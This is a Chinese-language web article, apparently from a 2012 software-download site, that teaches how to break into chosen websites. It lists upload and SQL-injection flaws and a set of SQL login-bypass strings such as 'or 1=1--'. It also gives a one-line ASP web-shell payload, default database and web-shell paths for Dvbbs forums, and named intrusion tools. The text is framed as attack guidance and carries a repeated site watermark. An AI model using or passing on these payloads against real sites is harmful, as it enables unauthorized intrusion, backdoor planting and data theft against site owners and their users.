揭开国内外黑客入侵网站的常用方法

您当前位置:首页 > 红讯频道 > 网络技术

  • 红软基地 推荐
  • 2012-01-18

  如何入侵指定网站! Hjh红软基地
Hjh红软基地
  首先,观察指定网站。 Hjh红软基地
Hjh红软基地
  入侵指定网站是需要条件的: Hjh红软基地
Hjh红软基地
  要先观察这个网站是动态还是静态的。 Hjh红软基地
Hjh红软基地
  首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 Hjh红软基地
Hjh红软基地
  如果是静态的(.htm或html),一般是不会成功的。 Hjh红软基地
Hjh红软基地
  如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。 Hjh红软基地
Hjh红软基地
  Quote:以下是入侵网站常用方法: Hjh红软基地
Hjh红软基地
  1.上传漏洞 Hjh红软基地
Hjh红软基地
  如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了! Hjh红软基地
Hjh红软基地
  有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. Hjh红软基地
Hjh红软基地
  2.注入漏洞 Hjh红软基地
Hjh红软基地
  字符过滤不严造成的 Hjh红软基地
Hjh红软基地
  3.暴库:把二级目录中间的/换成%5c Hjh红软基地
Hjh红软基地
  4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有: Hjh红软基地
Hjh红软基地
  ’or’’=’ " or "a"="a   ’) or (’a’=’a   ") or ("a"="a  or 1=1--  ’ or ’a’=’a Hjh红软基地
Hjh红软基地
  5.社会工程学。这个我们都知道吧。就是猜解。 Hjh红软基地
Hjh红软基地
  6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 (数据库必需得是ASP或ASA的后缀) Hjh红软基地
Hjh红软基地
  7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改 Hjh红软基地
Hjh红软基地
  比如:默认数据库,默认后台地址,默认管理员帐号密码等 Hjh红软基地
Hjh红软基地
  8.默认数据库/webshell路径利用:这样的网站很多/利人别人的 Hjh红软基地
Hjh红软基地
  /Databackup/dvbbs7.MDB Hjh红软基地
Hjh红软基地
  /bbs/Databackup/dvbbs7.MDB Hjh红软基地
Hjh红软基地
  /bbs/Data/dvbbs7.MDB Hjh红软基地
Hjh红软基地
  /data/dvbbs7.mdb W7 Hjh红软基地
Hjh红软基地
  /bbs/diy.asp Hjh红软基地
Hjh红软基地
  /diy.asp Hjh红软基地
Hjh红软基地
  /bbs/cmd.asp Hjh红软基地
Hjh红软基地
  /bbs/cmd.exe Hjh红软基地
Hjh红软基地
  /bbs/s-u.exe Hjh红软基地
Hjh红软基地
  /bbs/servu.exe Hjh红软基地
Hjh红软基地
  工具:网站猎手 挖掘鸡 明小子 Hjh红软基地
Hjh红软基地
  9.查看目录法:一些网站可以断开目录,可以访问目录。 Hjh红软基地
Hjh红软基地
  210.37.95.65 imagesHjh红软基地

来源:红讯频道

专题合集 | 手机游戏 | 最近更新 | 下载排行 | 提交软件 | 在线病毒扫描 | 联系我们 | 版权声明 | 网站地图
Copyright ©2006-2013 红软基地(www.longinofamily.com). 湘ICP备2024053236号-1